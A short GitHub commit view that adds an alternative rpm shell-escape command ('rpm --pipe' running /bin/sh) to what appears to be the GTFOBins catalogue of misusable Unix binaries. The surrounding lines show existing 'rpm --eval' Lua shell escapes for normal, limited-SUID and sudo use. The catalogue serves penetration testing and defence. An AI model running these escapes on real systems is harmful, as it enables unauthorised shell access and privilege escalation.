Add alternative shell for rpm

This commit is contained in:
Andrea Cardaci 2021-04-08 07:58:39 +02:00 committed by GitHub
commit 6fda805b6a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -2,6 +2,7 @@
functions: functions:
shell: shell:
- code: rpm --eval '%{lua:os.execute("/bin/sh")}' - code: rpm --eval '%{lua:os.execute("/bin/sh")}'
- code: rpm --pipe '/bin/sh 0<&1'
limited-suid: limited-suid:
- code: ./rpm --eval '%{lua:os.execute("/bin/sh")}' - code: ./rpm --eval '%{lua:os.execute("/bin/sh")}'
sudo: sudo: